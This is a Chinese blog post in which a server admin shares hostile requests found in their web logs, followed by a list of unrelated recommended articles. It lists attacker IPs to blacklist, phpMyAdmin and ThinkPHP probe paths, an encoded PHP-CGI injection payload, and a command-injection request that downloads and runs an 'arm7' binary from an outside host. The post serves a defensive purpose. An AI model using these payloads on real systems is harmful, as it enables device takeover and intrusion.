分享查日志发现的php web请求攻击
于 2020-06-13 14:38:43 发布
3469
2020年8月26日 更新黑名单IP列表
前些天闲着无聊,看看服务器的请求日志。真是不看不知道,一看吓一跳!
来自各地的攻击请求比访问请求多好多……
虽说限于黑客水平没造成有效攻击,但小编还是决定做一点事情。比如:将恶意IP加黑名单,写文纪念下有黑客攻击的日子。
记得上一次发现异常,是在大约一年前服务器CPU占用100%的时候。细节遗忘,只记得杀进程关端口,粗略处理后便OK了。
本文将请求来源IP及请求贴出来,方便路过的朋友加以防范。
IP
183.192.179.16 182.254.52.17 14.18.182.223 61.241.50.63 139.162.88.63
47.108.80.103 111.206.250.230 111.206.250.229 111.206.250.198 93.174.93.143
193.112.246.211 216.244.66.202 182.254.52.17 89.154.165.167 41.42.113.174
51.254.111.118 61.162.213.225 123.185.198.200 139.199.184.166 132.145.136.225 185.142.236.34 185.234.217.231 115.238.89.35 115.236.45.236 103.85.86.195 156.225.14.140 115.236.172.148 103.93.252.117 185.142.236.34 182.88.233.222 106.45.0.117 5.188.86.218 180.76.170.52 218.95.182.135
115.236.45.236 195.54.160.21对于这些IP,可以直接加黑名单。或许有些IP是被利用,但一并连坐。
请求
/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
http:// xxx:xxx:xxx:xxx//myadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx//phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/pma2011/scripts/setup.php
http:// xxx:xxx:xxx:xxx/muieblackcat
92.118.161.33 - - [29/Mar/2020:05:48:22 +0800] "GET / HTTP/1.1" 200 17899 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
http:// xxx:xxx:xxx:xxx/thinkphp/html/public/index.php
http:// xxx:xxx:xxx:xxx/TP/index.php
http:// xxx:xxx:xxx:xxx/TP/public/index.php
http://clientapi.ipip.net/echo.php?info=1234567890
http:// xxx:xxx:xxx:xxx/portal/redlion
POST
/boaform/admin/formPing
http://5.188.210.101/echo.php
http://xunsu.online/server-status
/data/admin/allowurl.txt
/xd.php
/robots.txt
http:// xxx:xxx:xxx:xxx/Report.docx
http://clientapi.ipip.net/echo.php?info=1234567890
/solr/admin/info/system?wt=json
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/?XDEBUG_SESSION_START=phpstorm
/HNAP1/
/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
/statics/css/crop.css
/js/index.js
/public/simpleboot/css/simplebootadmin.css
/js/tc.js HTTP/1.1
/public/js/image.js
/wangdafa
http:// xxx:xxx:xxx:xxx/hudson
http://xunsu.online/xd.php
/hazelcast/rest/cluster
/index.php?s=/index/
/myadmin/scripts/db___.init.php
/plugins/weathermap/editor.php
/weathermap/editor.php
/Joomla/
93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:29 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:30 +0800] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /pma2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /pma2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /PMA2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /pma2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /PMA2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /PMA2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /PMA2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /pma2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin4/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin5/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin6/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:39 +0800] "GET /phpmyadmin7/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 404 219 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:41 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:42 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:43 +0800] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1" 404 234 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.1" 404 236 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 248 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /scripts/setup.php HTTP/1.1" 404 215 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"
POST
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E仔细观察以上请求,不难发现攻击主要分为两类,一类是针对PMA的,另一类是遍历thinphp、WordPress等开源框架和开源CMS系统的已知存在bug的文件。稍作防范,即可防御大部分攻击。
推荐阅读
计算机基础算法篇(二)—— 对称加密算法
##对称加密算法 在对称加密算法中,数据发信方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。收信方收到密文后,若想解读原文,则需要使用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数据进行加密和解密,这就要求解密方事先必须知道加密密钥。 ##常
##对称加密算法 在对称加密算法中,数据发信方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。收信方收到密文后,若想解读原文,则需要使用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数据进行加密和解密,这就要求解密方事先必须知道加密密钥。 ##常
60
网络安全基础篇(一)—— 常见名词解释1
##信息安全领域,渗透测试,漏扫,加固,逆向分别指什么 **渗透测试(Penetration Testing)**:渗透测试是一种针对计算机系统、网络或应用程序的安全评估方法。通过模拟攻击者的行为,渗透测试专家试图利用系统的漏洞或弱点来获取未经授权的访问权限,以评估系统的安全性,并提供改进建议。 **漏洞扫描(Vulnerability Scanning)**:漏洞扫描是通过自动化工具检测计算机
##信息安全领域,渗透测试,漏扫,加固,逆向分别指什么 **渗透测试(Penetration Testing)**:渗透测试是一种针对计算机系统、网络或应用程序的安全评估方法。通过模拟攻击者的行为,渗透测试专家试图利用系统的漏洞或弱点来获取未经授权的访问权限,以评估系统的安全性,并提供改进建议。 **漏洞扫描(Vulnerability Scanning)**:漏洞扫描是通过自动化工具检测计算机
39
商务那些事(一)
##公共采购方式 公共采购一般包含以下几种方式: **公开招标**:这是最常用的一种采购方式,通过发布公告,邀请所有潜在的供应商参加竞争。招标人从应答人中择优选择中标(成交)供应商。这种方式的优势在于具有公开性和竞争性,可以降低采购成本,提高采购效率。 **邀请招标**:也称为有限竞争,这种方式不是对所有供应商开放,而是邀请少数特定的供应商参加竞争。这种方式的优点是节约
##公共采购方式 公共采购一般包含以下几种方式: **公开招标**:这是最常用的一种采购方式,通过发布公告,邀请所有潜在的供应商参加竞争。招标人从应答人中择优选择中标(成交)供应商。这种方式的优势在于具有公开性和竞争性,可以降低采购成本,提高采购效率。 **邀请招标**:也称为有限竞争,这种方式不是对所有供应商开放,而是邀请少数特定的供应商参加竞争。这种方式的优点是节约
44
知识点学习Day5
1、公共采购方式(1) 公开招标:公开招标是最常见的招标方式,采购方在公共平台发布招标信息,符合条件的供应商都可以参与投标。公开招标的优点是投标人较多、竞争充分、不容易出现串标、围标等情况。 (2) 邀请招标:邀请招标是指采购人依法从符合相应资格条件的供应商中随机邀请3家以上供应商,并以投标邀请书的方式邀请其参加投标。这种方式是非公开性质的,通常适用于国家重点项目或国有资金占控
1、公共采购方式(1) 公开招标:公开招标是最常见的招标方式,采购方在公共平台发布招标信息,符合条件的供应商都可以参与投标。公开招标的优点是投标人较多、竞争充分、不容易出现串标、围标等情况。 (2) 邀请招标:邀请招标是指采购人依法从符合相应资格条件的供应商中随机邀请3家以上供应商,并以投标邀请书的方式邀请其参加投标。这种方式是非公开性质的,通常适用于国家重点项目或国有资金占控
49
知识点学习Day4
C语言实现冒泡排序 1、升序排序: void asc(int *a,intn){ int i=0,j=0; for( i=0;i<n-1;i++){ for(j=0;j<n-1;j++){
C语言实现冒泡排序 1、升序排序: void asc(int *a,intn){ int i=0,j=0; for( i=0;i<n-1;i++){ for(j=0;j<n-1;j++){
44
计算机基础算法篇(一)—— 冒泡排序
##原理 对数组进行遍历,每次对相邻两个进行比较大小,若大的数值在前面则交换位置(升序),完成一趟遍历后数组中最大的数值到了数组的末尾位置,再对前面n-1个数值进行相同的遍历,一共完成n-1次遍历就实现了排序完成,时间复杂度是O(n^2),空间复杂度O(1)。 ##代码实现 ###C语言 ```C #include void bubble_sort(int arr[],
##原理 对数组进行遍历,每次对相邻两个进行比较大小,若大的数值在前面则交换位置(升序),完成一趟遍历后数组中最大的数值到了数组的末尾位置,再对前面n-1个数值进行相同的遍历,一共完成n-1次遍历就实现了排序完成,时间复杂度是O(n^2),空间复杂度O(1)。 ##代码实现 ###C语言 ```C #include void bubble_sort(int arr[],
61
知识点学习Day3
1. 使用 C语言开发的软件,一般情况下要如何测试?C语言开发完成的软件,主要执行一下步骤完成测试:(1)需求分析:首先明确软件的需求和功能,确保测试团队对软件的功能和目标有清晰的理解。(2)制定测试计划:根据需求分析,制定详细的测试计划,包括测试的目标、范围、资源、时间表等。(3)创建测试环境:准备测试所需的硬件、软件和网络环境,确保测试环境与实际运行环境相似。(4)编写测试用例:根据
1. 使用 C语言开发的软件,一般情况下要如何测试?C语言开发完成的软件,主要执行一下步骤完成测试:(1)需求分析:首先明确软件的需求和功能,确保测试团队对软件的功能和目标有清晰的理解。(2)制定测试计划:根据需求分析,制定详细的测试计划,包括测试的目标、范围、资源、时间表等。(3)创建测试环境:准备测试所需的硬件、软件和网络环境,确保测试环境与实际运行环境相似。(4)编写测试用例:根据
52
计算机基础软件测试篇(一)—— C语言开发软件
##什么是系统测试,C 语言的系统测试有哪些方法? 系统测试是软件开发过程中的一种测试方法,旨在验证整个软件系统的功能、性能和稳定性,以确保软件在实际环境中正常工作。 在C语言中,系统测试的方法可以有以下几种: 单元测试(Unit Testing):对程序中的每个函数或模块进行测试,确保其独立的功能正确实现。可以使用测试框架如Google T
##什么是系统测试,C 语言的系统测试有哪些方法? 系统测试是软件开发过程中的一种测试方法,旨在验证整个软件系统的功能、性能和稳定性,以确保软件在实际环境中正常工作。 在C语言中,系统测试的方法可以有以下几种: 单元测试(Unit Testing):对程序中的每个函数或模块进行测试,确保其独立的功能正确实现。可以使用测试框架如Google T
43
计算机基础运维篇(一)—— Apache与Nginx
##Nginx 轻量级,采用 C 进行编写,同样的 web 服务,会占用更少的内存及资源; 抗并发,nginx 以 epoll and kqueue 作为开发模型,处理请求是异步非阻塞的,负载能力比;apache 高很多,而 apache 则是阻塞型的。在高并发下 nginx 能保持低资源低消耗高性能 ,而 apache 在 PHP 处理慢或者前端压力很大的情况下,很容易出现进程数飙升,从而拒绝服
##Nginx 轻量级,采用 C 进行编写,同样的 web 服务,会占用更少的内存及资源; 抗并发,nginx 以 epoll and kqueue 作为开发模型,处理请求是异步非阻塞的,负载能力比;apache 高很多,而 apache 则是阻塞型的。在高并发下 nginx 能保持低资源低消耗高性能 ,而 apache 在 PHP 处理慢或者前端压力很大的情况下,很容易出现进程数飙升,从而拒绝服
47
知识点学习Day2
1、简述面向对象编程和面向过程编程,区别面向对象(OOP):以对象为核心的编程方式,程序的主体是对象,对象具有属性和方法的实体,通过对象之间进行操作完成交互,通过定义类,可以创建多个对象实例,它的基本特征有三:封装性、继承性和多态性。封装是指将对象的属性和方法封装在类中,外部不能直接访问,内部访问时,调用其方法类方法就可以,继承是可以从已有的类派生出新的类,并且可以获取父类的属性和方法,多态是指统
1、简述面向对象编程和面向过程编程,区别面向对象(OOP):以对象为核心的编程方式,程序的主体是对象,对象具有属性和方法的实体,通过对象之间进行操作完成交互,通过定义类,可以创建多个对象实例,它的基本特征有三:封装性、继承性和多态性。封装是指将对象的属性和方法封装在类中,外部不能直接访问,内部访问时,调用其方法类方法就可以,继承是可以从已有的类派生出新的类,并且可以获取父类的属性和方法,多态是指统
53
计算机基础前端篇(一)—— 常见的前端框架
## vue ### 特点 Vue 是一个以数据驱动视图的轻量级渐进式 MVVM 框架。目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件,所以其核心是一个响应的数据绑定系统。 **注**:*数据驱动视图: 常规的 js 都是操作 dom 来开发程序,代表者 jquery ,而Vue 不用直接操作 dom,是用数据来控制元素的变化。
## vue ### 特点 Vue 是一个以数据驱动视图的轻量级渐进式 MVVM 框架。目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件,所以其核心是一个响应的数据绑定系统。 **注**:*数据驱动视图: 常规的 js 都是操作 dom 来开发程序,代表者 jquery ,而Vue 不用直接操作 dom,是用数据来控制元素的变化。
56
作业1(0103)
一、列举你熟悉的三个前端框架,简述优缺点和特点。 答: Vue : Vue 是尤雨溪编写的一个构建数据驱动的 Web 界面的库,准确来说不是一个框架,它聚焦在 V ( view )视图层。
一、列举你熟悉的三个前端框架,简述优缺点和特点。 答: Vue : Vue 是尤雨溪编写的一个构建数据驱动的 Web 界面的库,准确来说不是一个框架,它聚焦在 V ( view )视图层。
49